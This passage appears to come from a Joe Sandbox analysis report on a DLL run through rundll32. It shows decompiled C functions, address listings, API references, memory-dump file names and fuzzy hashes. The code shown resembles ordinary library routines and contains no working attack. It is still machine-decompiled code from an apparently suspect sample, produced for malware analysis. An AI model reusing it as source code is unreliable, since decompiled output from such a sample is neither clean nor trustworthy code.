                                                                                                                                                                            					_t201 = _t201 | E10010087(_t187, _t190, _t201, __eflags,  &_v16, 0x200);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000400;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 1;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x400);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00000800;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x40;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x800);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00001000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 4;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x1000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00002000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x80;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x2000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00004000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x800;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x4000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00008000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x400;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x8000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00010000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x200;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x10000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00020000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x100;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x20000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				__eflags = _a4 & 0x00040000;
                                                                                                                                                                            				if(__eflags != 0) {
                                                                                                                                                                            					_v12 = 0x8000;
                                                                                                                                                                            					_t201 = _t201 | E10010087(0x400, _t190, _t201, __eflags,  &_v16, 0x40000);
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				_t191 = _v8;
                                                                                                                                                                            				 *(_t191 + 0x18) =  *(_t191 + 0x18) | _t201;
                                                                                                                                                                            				_t139 =  *(_t191 + 0x18);
                                                                                                                                                                            				__eflags = (_t139 & 0x00003fc0) - 0x3fc0;
                                                                                                                                                                            				if((_t139 & 0x00003fc0) == 0x3fc0) {
                                                                                                                                                                            					 *(_t191 + 0x18) = _t139 | 0x00000010;
                                                                                                                                                                            					_t201 = _t201 | 0x00000010;
                                                                                                                                                                            					__eflags = _t201;
                                                                                                                                                                            				}
                                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                                            				_t144 =  ~((_t201 & _a4) - _a4) + 1;
                                                                                                                                                                            				__eflags = _t144;
                                                                                                                                                                            				return _t144;
                                                                                                                                                                            			}



























                                                                                                                                                                            0x10012406
                                                                                                                                                                            0x1001240c
                                                                                                                                                                            0x10012411
                                                                                                                                                                            0x10012419
                                                                                                                                                                            0x10012419
                                                                                                                                                                            0x1001241c
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10012420
                                                                                                                                                                            0x10012426
                                                                                                                                                                            0x10012427
                                                                                                                                                                            0x10012428
                                                                                                                                                                            0x10012432
                                                                                                                                                                            0x10012434
                                                                                                                                                                            0x10012441
                                                                                                                                                                            0x10012444
                                                                                                                                                                            0x10012449
                                                                                                                                                                            0x10012452
                                                                                                                                                                            0x10012455
                                                                                                                                                                            0x1001245a
                                                                                                                                                                            0x1001245b
                                                                                                                                                                            0x1001245e
                                                                                                                                                                            0x10012461
                                                                                                                                                                            0x10012466
                                                                                                                                                                            0x10012467
                                                                                                                                                                            0x1001246e
                                                                                                                                                                            0x10012475
                                                                                                                                                                            0x1001247a
                                                                                                                                                                            0x1001247c
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247e
                                                                                                                                                                            0x1001247c
                                                                                                                                                                            0x1001247f
                                                                                                                                                                            0x10012483
                                                                                                                                                                            0x10012485
                                                                                                                                                                            0x1001248f
                                                                                                                                                                            0x10012490
                                                                                                                                                                            0x10012497
                                                                                                                                                                            0x1001249c
                                                                                                                                                                            0x1001249e
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x100124a0
                                                                                                                                                                            0x1001249e
                                                                                                                                                                            0x100124a3
                                                                                                                                                                            0x100124a7
                                                                                                                                                                            0x100124ac
                                                                                                                                                                            0x100124ad
                                                                                                                                                                            0x100124b0
                                                                                                                                                                            0x100124b7
                                                                                                                                                                            0x100124be
                                                                                                                                                                            0x100124c3
                                                                                                                                                                            0x100124c5
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c7
                                                                                                                                                                            0x100124c5
                                                                                                                                                                            0x100124ca
                                                                                                                                                                            0x100124ce
                                                                                                                                                                            0x100124de
                                                                                                                                                                            0x100124e1
                                                                                                                                                                            0x100124e4
                                                                                                                                                                            0x100124e9
                                                                                                                                                                            0x100124eb
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124ed
                                                                                                                                                                            0x100124eb
                                                                                                                                                                            0x100124f0
                                                                                                                                                                            0x100124f3
                                                                                                                                                                            0x10012503
                                                                                                                                                                            0x1001250a
                                                                                                                                                                            0x10012511
                                                                                                                                                                            0x10012516
                                                                                                                                                                            0x10012518
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x1001251a
                                                                                                                                                                            0x10012518
                                                                                                                                                                            0x1001251c
                                                                                                                                                                            0x10012520
                                                                                                                                                                            0x1001252b
                                                                                                                                                                            0x10012537
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012539
                                                                                                                                                                            0x10012540
                                                                                                                                                                            0x10012544
                                                                                                                                                                            0x1001254c
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x10012558
                                                                                                                                                                            0x1001255a
                                                                                                                                                                            0x1001255e
                                                                                                                                                                            0x10012569
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x10012575
                                                                                                                                                                            0x1001257c
                                                                                                                                                                            0x1001257f
                                                                                                                                                                            0x10012586
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x1001258e
                                                                                                                                                                            0x10012595
                                                                                                                                                                            0x10012598
                                                                                                                                                                            0x1001259f
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125ab
                                                                                                                                                                            0x100125b2
                                                                                                                                                                            0x100125b5
                                                                                                                                                                            0x100125bc
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125c8
                                                                                                                                                                            0x100125cf
                                                                                                                                                                            0x100125d2
                                                                                                                                                                            0x100125d9
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125e5
                                                                                                                                                                            0x100125ec
                                                                                                                                                                            0x100125ef
                                                                                                                                                                            0x100125f6
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012602
                                                                                                                                                                            0x10012609
                                                                                                                                                                            0x1001260c
                                                                                                                                                                            0x10012613
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x1001261f
                                                                                                                                                                            0x10012626
                                                                                                                                                                            0x10012629
                                                                                                                                                                            0x10012630
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x10012638
                                                                                                                                                                            0x1001263f
                                                                                                                                                                            0x10012642
                                                                                                                                                                            0x10012649
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012651
                                                                                                                                                                            0x10012658
                                                                                                                                                                            0x1001265b
                                                                                                                                                                            0x10012662
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x1001266e
                                                                                                                                                                            0x10012675
                                                                                                                                                                            0x10012678
                                                                                                                                                                            0x1001267f
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x1001268b
                                                                                                                                                                            0x10012692
                                                                                                                                                                            0x10012695
                                                                                                                                                                            0x1001269c
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a4
                                                                                                                                                                            0x100126a6
                                                                                                                                                                            0x100126a9
                                                                                                                                                                            0x100126ac
                                                                                                                                                                            0x100126b8
                                                                                                                                                                            0x100126ba
                                                                                                                                                                            0x100126bf
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126c2
                                                                                                                                                                            0x100126d1
                                                                                                                                                                            0x100126d3
                                                                                                                                                                            0x100126d3
                                                                                                                                                                            0x00000000

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _memset
                                                                                                                                                                            • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                                                                            • API String ID: 2102423945-4122032997
                                                                                                                                                                            • Opcode ID: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                                                                                            • Instruction ID: 475a3f3acc0ffbf0912b6f4f501dab117ae518df3bc7e116c44220daacf7d2ae
                                                                                                                                                                            • Opcode Fuzzy Hash: 6a965a47b8202c06a0f9d29b019c3ce5b36ca544f607173cb73e005fb23cc034
                                                                                                                                                                            • Instruction Fuzzy Hash: 658130B5D00259AADB41CFA4C581BDEBBF8FF08384F118165F949EA181E774DAD4CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _strlen$IconLoad_memset
                                                                                                                                                                            • String ID: 127.0.0.1
                                                                                                                                                                            • API String ID: 858515944-3619153832
                                                                                                                                                                            • Opcode ID: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                                                                                            • Instruction ID: 391a885bd144bb184e99009df4bcd3f8a2a5cd6933164126564d3f2e09fb5126
                                                                                                                                                                            • Opcode Fuzzy Hash: e9afa9abf4479f427d282929ffcd92459c0614fc8bef9fc4e3152ff44be5b39a
                                                                                                                                                                            • Instruction Fuzzy Hash: 835106B4D04298DBEB14CFA4D891B9DBBB1EF44344F1081A9E50D6B386DB356E44CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                                            			E1001486F(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                            				short _v72;
                                                                                                                                                                            				char* _v76;
                                                                                                                                                                            				signed int _v80;
                                                                                                                                                                            				signed int* _v84;
                                                                                                                                                                            				signed int _v88;
                                                                                                                                                                            				intOrPtr _v92;
                                                                                                                                                                            				void* __edi;
                                                                                                                                                                            				void* __ebp;
                                                                                                                                                                            				signed int _t54;
                                                                                                                                                                            				void* _t66;
                                                                                                                                                                            				short* _t70;
                                                                                                                                                                            				signed int _t72;
                                                                                                                                                                            				signed int _t81;
                                                                                                                                                                            				signed int* _t83;
                                                                                                                                                                            				short* _t84;
                                                                                                                                                                            				void* _t91;
                                                                                                                                                                            				signed int* _t98;
                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                            				void** _t100;
                                                                                                                                                                            				intOrPtr _t102;
                                                                                                                                                                            				signed int _t104;
                                                                                                                                                                            				signed int _t106;
                                                                                                                                                                            				void* _t107;
                                                                                                                                                                            
                                                                                                                                                                            				_t101 = __esi;
                                                                                                                                                                            				_t97 = __edx;
                                                                                                                                                                            				_t82 = __ebx;
                                                                                                                                                                            				_t54 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_v8 = _t54 ^ _t106;
                                                                                                                                                                            				_t100 = __ecx;
                                                                                                                                                                            				_v76 = _a4;
                                                                                                                                                                            				if(__ecx[1] != 0) {
                                                                                                                                                                            					_push(__ebx);
                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                            					_t83 = GlobalLock( *__ecx);
                                                                                                                                                                            					_v84 = _t83;
                                                                                                                                                                            					_v88 = 0 | _t83[0] == 0x0000ffff;
                                                                                                                                                                            					_v80 = E100146B2(_t83);
                                                                                                                                                                            					_t102 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
                                                                                                                                                                            					_v92 = _t102;
                                                                                                                                                                            					if(_v88 == 0) {
                                                                                                                                                                            						 *_t83 =  *_t83 | 0x00000040;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t83[3] = _t83[3] | 0x00000040;
                                                                                                                                                                            					}
                                                                                                                                                                            					if(lstrlenA(_v76) >= 0x20) {
                                                                                                                                                                            						L15:
                                                                                                                                                                            						_t66 = 0;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						_t97 = _t102 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
                                                                                                                                                                            						_v76 = _t97;
                                                                                                                                                                            						if(_t97 < _t102) {
                                                                                                                                                                            							goto L15;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							_t70 = E100146DD(_t83);
                                                                                                                                                                            							_t91 = 0;
                                                                                                                                                                            							_t84 = _t70;
                                                                                                                                                                            							if(_v80 != 0) {
                                                                                                                                                                            								_t81 = E100169F6(_t84 + _t102);
                                                                                                                                                                            								_t97 = _v76;
                                                                                                                                                                            								_t91 = _t102 + 2 + _t81 * 2;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t33 = _t97 + 3; // 0x3
                                                                                                                                                                            							_t98 = _v84;
                                                                                                                                                                            							_t36 = _t84 + 3; // 0x10002
                                                                                                                                                                            							_t72 = _t91 + _t36 & 0xfffffffc;
                                                                                                                                                                            							_t104 = _t84 + _t33 & 0xfffffffc;
                                                                                                                                                                            							_v80 = _t72;
                                                                                                                                                                            							if(_v88 == 0) {
                                                                                                                                                                            								_t99 =  *(_t98 + 8) & 0x0000ffff;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t99 =  *(_t98 + 0x10) & 0x0000ffff;
                                                                                                                                                                            							}
                                                                                                                                                                            							if(_v76 == _t91 || _t99 <= 0) {
                                                                                                                                                                            								L17:
                                                                                                                                                                            								 *_t84 = _a8;
                                                                                                                                                                            								_t97 =  &_v72;
                                                                                                                                                                            								E100147F2(_t84 + _v92, _t100, _t104, _t106, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
                                                                                                                                                                            								_t100[1] = _t100[1] + _t104 - _v80;
                                                                                                                                                                            								GlobalUnlock( *_t100);
                                                                                                                                                                            								_t100[2] = _t100[2] & 0x00000000;
                                                                                                                                                                            								_t66 = 1;
                                                                                                                                                                            							} else {
                                                                                                                                                                            								_t97 = _t100[1];
                                                                                                                                                                            								_t95 = _t97 - _t72 + _v84;
                                                                                                                                                                            								if(_t97 - _t72 + _v84 <= _t97) {
                                                                                                                                                                            									E100147F2(_t84, _t100, _t104, _t106, _t104, _t95, _t72, _t95);
                                                                                                                                                                            									_t107 = _t107 + 0x10;
                                                                                                                                                                            									goto L17;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									goto L15;
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					_pop(_t101);
                                                                                                                                                                            					_pop(_t82);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					_t66 = 0;
                                                                                                                                                                            				}
                                                                                                                                                                            				return E100167D5(_t66, _t82, _v8 ^ _t106, _t97, _t100, _t101);
                                                                                                                                                                            			}



























                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x1001486f
                                                                                                                                                                            0x10014875
                                                                                                                                                                            0x1001487c
                                                                                                                                                                            0x10014883
                                                                                                                                                                            0x10014889
                                                                                                                                                                            0x1001488c
                                                                                                                                                                            0x10014895
                                                                                                                                                                            0x10014896
                                                                                                                                                                            0x1001489f
                                                                                                                                                                            0x100148ad
                                                                                                                                                                            0x100148b0
                                                                                                                                                                            0x100148b8
                                                                                                                                                                            0x100148ce
                                                                                                                                                                            0x100148d0
                                                                                                                                                                            0x100148d3
                                                                                                                                                                            0x100148db
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148d5
                                                                                                                                                                            0x100148ea
                                                                                                                                                                            0x10014968
                                                                                                                                                                            0x10014968
                                                                                                                                                                            0x100148ec
                                                                                                                                                                            0x10014901
                                                                                                                                                                            0x10014906
                                                                                                                                                                            0x10014909
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x1001490b
                                                                                                                                                                            0x1001490c
                                                                                                                                                                            0x10014912
                                                                                                                                                                            0x10014917
                                                                                                                                                                            0x10014919
                                                                                                                                                                            0x1001491f
                                                                                                                                                                            0x10014924
                                                                                                                                                                            0x10014928
                                                                                                                                                                            0x10014928
                                                                                                                                                                            0x1001492c
                                                                                                                                                                            0x10014930
                                                                                                                                                                            0x10014933
                                                                                                                                                                            0x10014937
                                                                                                                                                                            0x1001493a
                                                                                                                                                                            0x10014941
                                                                                                                                                                            0x10014944
                                                                                                                                                                            0x1001494c
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014946
                                                                                                                                                                            0x10014953
                                                                                                                                                                            0x10014978
                                                                                                                                                                            0x1001497f
                                                                                                                                                                            0x10014988
                                                                                                                                                                            0x10014990
                                                                                                                                                                            0x1001499d
                                                                                                                                                                            0x100149a0
                                                                                                                                                                            0x100149a6
                                                                                                                                                                            0x100149ac
                                                                                                                                                                            0x1001495a
                                                                                                                                                                            0x1001495a
                                                                                                                                                                            0x10014961
                                                                                                                                                                            0x10014966
                                                                                                                                                                            0x10014970
                                                                                                                                                                            0x10014975
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x10014966
                                                                                                                                                                            0x10014953
                                                                                                                                                                            0x10014909
                                                                                                                                                                            0x100149ad
                                                                                                                                                                            0x100149ae
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x1001488e
                                                                                                                                                                            0x100149bb

                                                                                                                                                                            APIs
                                                                                                                                                                            • GlobalLock.KERNEL32 ref: 10014899
                                                                                                                                                                            • lstrlenA.KERNEL32(?), ref: 100148E1
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 100148FB
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000003.00000002.254237600.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                            • Associated: 00000003.00000002.254232913.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254260062.0000000010029000.00000002.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254269049.0000000010032000.00000008.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254289924.0000000010056000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254295503.000000001005A000.00000004.00020000.sdmp Download File
                                                                                                                                                                            • Associated: 00000003.00000002.254300851.000000001005D000.00000002.00020000.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                                                                            • String ID: System
                                                                                                                                                                            • API String ID: 1529587224-3470857405
                                                                                                                                                                            • Opcode ID: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                                                                                            • Instruction ID: 74ffa1d7f554f06ed3380e5a1b3eb1278af2c0b09513685a0b874fafc39ddc5e
                                                                                                                                                                            • Opcode Fuzzy Hash: 5539861cf9964bd4a1f8d2b85f820bea2489ddcf645bd320d082abb330923d9c
                                                                                                                                                                            • Instruction Fuzzy Hash: FA41B271D00225DFDB04DFA4C885AAEBBB5FF04354F268129E411EF195EB70E986CB90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                            			E1000B3AF(void* __edx, signed int _a116, char _a120) {
                                                                                                                                                                            				void _v12;
                                                                                                                                                                            				char _v16;
                                                                                                                                                                            				signed int _v20;
                                                                                                                                                                            				int _v24;
                                                                                                                                                                            				char _v124;
                                                                                                                                                                            				char _v172;
                                                                                                                                                                            				intOrPtr _v184;
                                                                                                                                                                            				int __ebx;
                                                                                                                                                                            				signed int __edi;
                                                                                                                                                                            				signed int __esi;
                                                                                                                                                                            				signed int __ebp;
                                                                                                                                                                            				signed int _t26;
                                                                                                                                                                            				unsigned int _t28;
                                                                                                                                                                            				intOrPtr _t35;
                                                                                                                                                                            				unsigned int _t39;
                                                                                                                                                                            				intOrPtr _t40;
                                                                                                                                                                            				void* _t42;
                                                                                                                                                                            				void* _t43;
                                                                                                                                                                            				signed int _t45;
                                                                                                                                                                            
                                                                                                                                                                            				_t45 =  &_v124;
                                                                                                                                                                            				_t26 =  *0x10057a08; // 0xaf9b6515
                                                                                                                                                                            				_a116 = _t26 ^ _t45;
                                                                                                                                                                            				_push(_t43);
                                                                                                                                                                            				_push(_t42);
                                                                                                                                                                            				_t28 = GetMenuCheckMarkDimensions();
                                                                                                                                                                            				_t38 = _t28;
                                                                                                                                                                            				_t39 = _t28 >> 0x10;
                                                                                                                                                                            				_v24 = _t39;
                                                                                                                                                                            				if(_t28 <= 4 || __ecx <= 5) {
                                                                                                                                                                            					_push(_t45);
                                                                                                                                                                            					_push(_t39);
                                                                                                                                                                            					_v172 = 0x10057298;
                                                                                                                                                                            					E10017C83( &_v172, 0x1002e2fc);
                                                                                                                                                                            					asm("int3");
                                                                                                                                                                            					_push(4);
                                                                                                                                                                            					E10017BC1(E10027DEC, _t38, _t42, _t43);
                                                                                                                                                                            					_t40 = E10013965(0x104);
                                                                                                                                                                            					_v184 = _t40;
                                                                                                                                                                            					_t35 = 0;
                                                                                                                                                                            					_v172 = 0;
                                                                                                                                                                            					if(_t40 != 0) {
                                                                                                                                                                            						_t35 = E1000CF71(_t40);
                                                                                                                                                                            					}
                                                                                                                                                                            					return E10017C60(_t35);
                                                                                                                                                                            				} else {
                                                                                                                                                                            					if(__ebx > 0x20) {
                                                                                                                                                                            						__ebx = 0x20;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eax = __ebx - 4;
                                                                                                                                                                            					asm("cdq");
                                                                                                                                                                            					__eax = __ebx - 4 - __edx;
                                                                                                                                                                            					__esi = __ebx + 0xf;
                                                                                                                                                                            					__esi = __ebx + 0xf >> 4;
                                                                                                                                                                            					__ebx - 4 - __edx = __ebx - 4 - __edx >> 1;
                                                                                                                                                                            					__esi = __esi << 4;
                                                                                                                                                                            					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4);
                                                                                                                                                                            					__edi = (__ebx - 4 - __edx >> 1) + (__esi << 4) - __ebx;
                                                                                                                                                                            					if(__edi > 0xc) {
                                                                                                                                                                            						__edi = 0xc;
                                                                                                                                                                            					}
                                                                                                                                                                            					__eax = 0x20;
                                                                                                                                                                            					if(__ecx > __eax) {
                                                                                                                                                                            						_v24 = __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            					 &_v12 = E100174D0(__edi,  &_v12, 0xff, 0x80);
                                                                                                                                                                            					_v24 = _v24 + 0xfffffffa;
                                                                                                                                                                            					_v24 + 0xfffffffa >> 1 = (_v24 + 0xfffffffa >> 1) * __esi;
                                                                                                                                                                            					__ecx = __esi + __esi;
                                                                                                                                                                            					__eax = __ebp + (_v24 + 0xfffffffa >> 1) * __esi * 2 - 0xc;
                                                                                                                                                                            					__edx = 0x1002a144;
                                                                                                                                                                            					_v20 = __esi + __esi;
                                                                                                                                                                            					_v16 = 5;
                                                                                                                                                                            					do {
                                                                                                                                                                            						__si =  *__edx & 0x000000ff;
                                                                                                                                                                            						__ecx = __edi;
                                                                                                                                                                            						__si = ( *__edx & 0x000000ff) << __cl;
                                                                                                                                                                            						__edx =  &(__edx[1]);
                                                                                                                                                                            						__ecx = __si & 0x0000ffff;
                                                                                                                                                                            						__eax->i = __ch;
                                                                                                                                                                            						__eax->i = __cl;
                                                                                                                                                                            						__eax = __eax + _v20;
                                                                                                                                                                            						_t21 =  &_v16;
                                                                                                                                                                            						 *_t21 = _v16 - 1;
                                                                                                                                                                            					} while ( *_t21 != 0);
                                                                                                                                                                            					__eax =  &_v12;
                                                                                                                                                                            					__eax = CreateBitmap(__ebx, _v24, 1, 1,  &_v12);
                                                                                                                                                                            					_pop(__edi);
                                                                                                                                                                            					_pop(__esi);
                                                                                                                                                                            					 *0x1005aa80 = __eax;
                                                                                                                                                                            					_pop(__ebx);
                                                                                                                                                                            					if(__eax == 0) {
                                                                                                                                                                            						__eax = LoadBitmapA(__eax, 0x7fe3);
                                                                                                                                                                            						 *0x1005aa80 = __eax;
                                                                                                                                                                            					}
                                                                                                                                                                            					__ecx = _a116;
                                                                                                                                                                            					__ecx = _a116 ^ __ebp;
                                                                                                                                                                            					__eax = E100167D5(__eax, __ebx, _a116 ^ __ebp, __edx, __edi, __esi);
                                                                                                                                                                            					__ebp =  &_a120;
                                                                                                                                                                            					__esp =  &_a120;
                                                                                                                                                                            					_pop(__ebp);
                                                                                                                                                                            					return __eax;
                                                                                                                                                                            				}
                                                                                                                                                                            			}






















                                                                                                                                                                            0x1000b3b0
                                                                                                                                                                            0x1000b3ba
                                                                                                                                                                            0x1000b3c1
                                                                                                                                                                            0x1000b3c5
                                                                                                                                                                            0x1000b3c6
                                                                                                                                                                            0x1000b3c7
                                                                                                                                                                            0x1000b3cd
                                                                                                                                                                            0x1000b3d6
                                                                                                                                                                            0x1000b3d9
                                                                                                                                                                            0x1000b3dc
                                                                                                                                                                            0x1000a0db
                                                                                                                                                                            0x1000a0de
                                                                                                                                                                            0x1000a0e8
